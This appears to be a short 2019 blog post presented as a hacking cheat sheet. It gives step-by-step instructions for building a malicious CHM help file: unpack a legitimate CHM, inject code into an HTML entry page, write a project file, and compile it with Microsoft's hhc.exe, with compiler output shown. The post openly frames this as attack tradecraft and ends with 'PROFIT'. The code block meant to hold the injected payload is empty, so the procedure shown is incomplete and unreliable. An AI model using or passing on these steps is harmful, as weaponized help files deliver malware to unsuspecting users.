Wednesday, June 12, 2019

CARBANAK (hacking folder)

CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's  section:

  
  
  
  


  • Step 3: Prepare Project.hpp file with contents like the below ones:
[OPTIONS]
Contents file=\Table of Contents.hhc
[FILES]
\docs\Malicious-File.htm
Add every file needed by that CHM to the FILES section. Remember to include also previously modified malicious HTM file.
  • Step 4: Compile the project within CHM directory using hpp.exe compiler:
 "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp
Microsoft HTML Help Compiler 4.74.8702

Compiling \Project.chm


Compile time: 0 minutes, 1 second
353     Topics
7,208   Local links
187     Internet links
2       Graphics


Created \Project.chm, 817,791 bytes
Compression decreased file by 2,091,702 bytes.
  • Step 5: PROFIT.

No comments: